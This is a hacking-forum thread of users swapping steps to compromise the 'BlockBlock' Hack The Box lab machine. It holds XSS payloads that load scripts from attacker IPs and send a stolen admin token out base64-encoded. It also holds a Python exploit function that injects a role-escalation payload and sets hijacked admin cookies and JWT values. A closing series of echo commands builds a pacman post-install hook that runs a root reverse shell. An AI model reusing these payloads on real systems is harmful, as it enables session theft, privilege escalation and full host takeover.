Posts: 96
Threads: 2
Joined: Feb 2024
Nov 18, 2024, 07:14 PM
(This post was last modified: Nov 18, 2024, 07:46 PM by a44857437.)
(Nov 18, 2024, 06:32 PM)TxX Wrote: (Nov 18, 2024, 05:38 PM)a44857437 Wrote: (Nov 18, 2024, 05:30 PM)TxX Wrote: (Nov 18, 2024, 05:03 PM)a44857437 Wrote: (Nov 18, 2024, 04:03 AM)xianling88 Wrote: still no clue how to do this from step 1 and why is that cause my lack of knowledge and skill at blockchain and smart contract.
Just wondering how you authenticate, because I am getting that "Proxy coudn't verify token" error when trying to get the logs
let balance = await fetch(window.origin + "/api/json-rpc", {
method: 'POST',
headers: {
'Content-Type': 'application/json',
"token": jwtSecret['Authorization'],
},
body: JSON.stringify({
jsonrpc: "2.0",
method: "eth_getBalance",
params: [chatAddress, "latest"],
id: 1
})
});
thanks, is that the jwtSecret you get from /api/json-rpc as admin, right?
Yes, but no idea what to do with the Authorization token, I have never used blockchain before.
You should be able to call the blockchain rpc's like eth_getLogs etc. This should give you a contract number that you can use in eth_call
but I cannot get it to work yet
(Nov 18, 2024, 06:32 PM)TxX Wrote: (Nov 18, 2024, 05:38 PM)a44857437 Wrote: (Nov 18, 2024, 05:30 PM)TxX Wrote: (Nov 18, 2024, 05:03 PM)a44857437 Wrote: (Nov 18, 2024, 04:03 AM)xianling88 Wrote: still no clue how to do this from step 1 and why is that cause my lack of knowledge and skill at blockchain and smart contract.
Just wondering how you authenticate, because I am getting that "Proxy coudn't verify token" error when trying to get the logs
let balance = await fetch(window.origin + "/api/json-rpc", {
method: 'POST',
headers: {
'Content-Type': 'application/json',
"token": jwtSecret['Authorization'],
},
body: JSON.stringify({
jsonrpc: "2.0",
method: "eth_getBalance",
params: [chatAddress, "latest"],
id: 1
})
});
thanks, is that the jwtSecret you get from /api/json-rpc as admin, right?
Yes, but no idea what to do with the Authorization token, I have never used blockchain before.
I have sent you a PM with some more info
Posts: 104
Threads: 4
Joined: Oct 2023
(Nov 18, 2024, 01:01 PM)a44857437 Wrote: (Nov 18, 2024, 11:31 AM)olkn00b Wrote: (Nov 18, 2024, 11:00 AM)xianling88 Wrote: (Nov 18, 2024, 08:21 AM)Shoseathe Wrote: (Nov 18, 2024, 07:55 AM)olkn00b Wrote: where you able to get this to work with an external script? or directly with xss by wrapping it in the correct tags? (img)
I used an external script for it. The request for the external script was pretty reliable but getting the admin token back needed multiple tries, like 10 or 20
<img src=x onerror="var script = document.createElement('script'); script.src = 'http://10.10.16.10/exploit.js'; document.body.appendChild(script);" />
I used this to trigger the content of yours, but didn't get admin token, where is wrong???
try this one, and spam it.
<img src=\"1\" onerror=\"this.remove(); var s=document.createElement('script'); s.src='http://10.10.xx.xx/script.js'; document.body.appendChild(s);\">
I used a similar script, but for the username when you report user in the chat window, worked in one go for me, and you need to look carefully at the data you get back...
I used these payloads and injected in the username as well as the report user parameter but I never get a call back on my python server. Anyone could share the steps they followed?
Posts: 28
Threads: 0
Joined: Oct 2024
(Nov 18, 2024, 05:03 PM)a44857437 Wrote: (Nov 18, 2024, 04:03 AM)xianling88 Wrote: still no clue how to do this from step 1 and why is that cause my lack of knowledge and skill at blockchain and smart contract.
Just wondering how you authenticate, because I am getting that "Proxy coudn't verify token" error when trying to get the logs
Just follow the steps hints from this thread you'll be fine, usring below in a js file, and do the img onerror trick to extract admin token, use that to authenticate. But you need to try a lot times manually for this to work, as this is a buggy box, not that good, the blockchain idea is cool tho.
fetch('/api/info').then(response => response.text()).then(text => {
fetch('http://Your Kali IP/log?' + btoa(text), {
mode: 'no-cors'
});
});
Posts: 27
Threads: 0
Joined: Nov 2023
Can someone please explain how we can avoid getting this error message?
{"error":"Proxy Couldn't verify token"}
I'm trying to use the token from /api/json-rpc to run the eth_getLogs method This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.
Posts: 25
Threads: 0
Joined: Jul 2024
Nov 19, 2024, 02:06 AM
(This post was last modified: Nov 19, 2024, 02:07 AM by grisun0.)
(Nov 19, 2024, 01:29 AM)fl00d777 Wrote: Can someone please explain how we can avoid getting this error message?
{"error":"Proxy Couldn't verify token"}
I'm trying to use the token from /api/json-rpc to run the eth_getLogs method
def do_lol(self, line):
"""
Exploits a target by injecting a malicious payload and collecting admin information.
This function performs the following steps:
1. Logs in to the application with provided credentials.
2. Injects a malicious payload to elevate the role of a user to 'admin.'
3. Executes a secondary payload to exfiltrate admin tokens by abusing '/api/info.'
4. Prepares for further exploitation using '/admin' and '/api/json-rpc'.
Parameters:
line (str): Additional parameters for the target.
Returns:
None
"""
rhost = self.params["rhost"]
url = f'http://{rhost}'
lhost = self.params["lhost"]
payload = (
"<img src=x onerror=\"fetch('/api/update_role', {method: 'POST', headers: { 'Content-Type': 'application/json'}, "
"body: JSON.stringify({ 'username': 'grisun0', 'role': 'grisun0'})})\" />"
)
headers = {
"Content-Type": "application/json"
}
s = requests.Session()
print_msg(f"Logging in and sending payload to {url}")
login_response = s.post(f'{url}/api/login', headers=headers, json={"username": "grisun0", "password": "grisun0"})
if login_response.status_code == 200:
print_msg("Login successful. Injecting primary payload.")
s.cookies.set("role", "admin", domain="blockblock.htb", path="/")
s.cookies.set(
"token",
"eyJhbGciOi..............PJK18ySGlcZ_16dt9-UnKeX2fnM",
domain="blockblock.htb",
path="/",
)
s.cookies.set("username", "admin", domain="blockblock.htb", path="/")
jwt_secret = {"Authorization": "34fd1a8cb0b16.........bf2a5d3b9"}
chat_address = "0x1234567890abcdef1234567890abcdef12345678"
url = f"{url}/api/json-rpc"
headers = {
"Content-Type": "application/json",
"token": jwt_secret["Authorization"],
}
payload = {
"jsonrpc": "2.0",
"method": f"{line}",
"params": ["latest", False],
"id": 1
}
print_msg(payload)
response = s.post(url, headers=headers, json=payload)
print_msg(response.json())
return
Posts: 74
Threads: 0
Joined: Sep 2024
(Nov 19, 2024, 02:06 AM)grisun0 Wrote: (Nov 19, 2024, 01:29 AM)fl00d777 Wrote: Can someone please explain how we can avoid getting this error message?
{"error":"Proxy Couldn't verify token"}
I'm trying to use the token from /api/json-rpc to run the eth_getLogs method
def do_lol(self, line):
"""
Exploits a target by injecting a malicious payload and collecting admin information.
This function performs the following steps:
1. Logs in to the application with provided credentials.
2. Injects a malicious payload to elevate the role of a user to 'admin.'
3. Executes a secondary payload to exfiltrate admin tokens by abusing '/api/info.'
4. Prepares for further exploitation using '/admin' and '/api/json-rpc'.
Parameters:
line (str): Additional parameters for the target.
Returns:
None
"""
rhost = self.params["rhost"]
url = f'http://{rhost}'
lhost = self.params["lhost"]
payload = (
"<img src=x onerror=\"fetch('/api/update_role', {method: 'POST', headers: { 'Content-Type': 'application/json'}, "
"body: JSON.stringify({ 'username': 'grisun0', 'role': 'grisun0'})})\" />"
)
headers = {
"Content-Type": "application/json"
}
s = requests.Session()
print_msg(f"Logging in and sending payload to {url}")
login_response = s.post(f'{url}/api/login', headers=headers, json={"username": "grisun0", "password": "grisun0"})
if login_response.status_code == 200:
print_msg("Login successful. Injecting primary payload.")
s.cookies.set("role", "admin", domain="blockblock.htb", path="/")
s.cookies.set(
"token",
"eyJhbGciOi..............PJK18ySGlcZ_16dt9-UnKeX2fnM",
domain="blockblock.htb",
path="/",
)
s.cookies.set("username", "admin", domain="blockblock.htb", path="/")
jwt_secret = {"Authorization": "34fd1a8cb0b16.........bf2a5d3b9"}
chat_address = "0x1234567890abcdef1234567890abcdef12345678"
url = f"{url}/api/json-rpc"
headers = {
"Content-Type": "application/json",
"token": jwt_secret["Authorization"],
}
payload = {
"jsonrpc": "2.0",
"method": f"{line}",
"params": ["latest", False],
"id": 1
}
print_msg(payload)
response = s.post(url, headers=headers, json=payload)
print_msg(response.json())
return Any nudge for root ??? This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Asking for rep is not allowed | /Thread-Free-HTB-All-Active-Challanges-Flags
Posts: 27
Threads: 0
Joined: Nov 2023
(Nov 19, 2024, 02:06 AM)grisun0 Wrote: (Nov 19, 2024, 01:29 AM)fl00d777 Wrote: Can someone please explain how we can avoid getting this error message?
{"error":"Proxy Couldn't verify token"}
I'm trying to use the token from /api/json-rpc to run the eth_getLogs method
def do_lol(self, line):
"""
Exploits a target by injecting a malicious payload and collecting admin information.
This function performs the following steps:
1. Logs in to the application with provided credentials.
2. Injects a malicious payload to elevate the role of a user to 'admin.'
3. Executes a secondary payload to exfiltrate admin tokens by abusing '/api/info.'
4. Prepares for further exploitation using '/admin' and '/api/json-rpc'.
Parameters:
line (str): Additional parameters for the target.
Returns:
None
"""
rhost = self.params["rhost"]
url = f'http://{rhost}'
lhost = self.params["lhost"]
payload = (
"<img src=x onerror=\"fetch('/api/update_role', {method: 'POST', headers: { 'Content-Type': 'application/json'}, "
"body: JSON.stringify({ 'username': 'grisun0', 'role': 'grisun0'})})\" />"
)
headers = {
"Content-Type": "application/json"
}
s = requests.Session()
print_msg(f"Logging in and sending payload to {url}")
login_response = s.post(f'{url}/api/login', headers=headers, json={"username": "grisun0", "password": "grisun0"})
if login_response.status_code == 200:
print_msg("Login successful. Injecting primary payload.")
s.cookies.set("role", "admin", domain="blockblock.htb", path="/")
s.cookies.set(
"token",
"eyJhbGciOi..............PJK18ySGlcZ_16dt9-UnKeX2fnM",
domain="blockblock.htb",
path="/",
)
s.cookies.set("username", "admin", domain="blockblock.htb", path="/")
jwt_secret = {"Authorization": "34fd1a8cb0b16.........bf2a5d3b9"}
chat_address = "0x1234567890abcdef1234567890abcdef12345678"
url = f"{url}/api/json-rpc"
headers = {
"Content-Type": "application/json",
"token": jwt_secret["Authorization"],
}
payload = {
"jsonrpc": "2.0",
"method": f"{line}",
"params": ["latest", False],
"id": 1
}
print_msg(payload)
response = s.post(url, headers=headers, json=payload)
print_msg(response.json())
return
Thank you so much you rock! ^^ This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.
Posts: 69
Threads: 0
Joined: Aug 2024
(Nov 18, 2024, 05:36 PM)0x410x420x41 Wrote: Phew finally rooted, the escalation to root is rather strait forward after you get paul... just create a malicious package with a post-install action and install it 
so strait forward 80 people rooted that makes sense This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.
Posts: 74
Threads: 0
Joined: Sep 2024
(Nov 19, 2024, 05:25 AM)hackemall Wrote: (Nov 18, 2024, 05:36 PM)0x410x420x41 Wrote: Phew finally rooted, the escalation to root is rather strait forward after you get paul... just create a malicious package with a post-install action and install it
so strait forward 80 people rooted that makes sense
how to move on paul i got error ?? This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Asking for rep is not allowed | /Thread-Free-HTB-All-Active-Challanges-Flags
Posts: 69
Threads: 0
Joined: Aug 2024
echo "[Trigger]" > /tmp/hooks/revshell.hook
Add Trigger Information:
Run these commands one by one:
echo "Operation = Install" >> /tmp/hooks/revshell.hook
echo "Type = Package" >> /tmp/hooks/revshell.hook
echo "Target = *" >> /tmp/hooks/revshell.hook
Add Action Information:
Run these commands one by one to add the action section:
echo "" >> /tmp/hooks/revshell.hook
echo "[Action]" >> /tmp/hooks/revshell.hook
echo "Description = Reverse shell as root" >> /tmp/hooks/revshell.hook
echo "When = PostTransaction" >> /tmp/hooks/revshell.hook
echo "Exec = /tmp/root_revshell.sh" >> /tmp/hooks/revshell.hook This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.
|
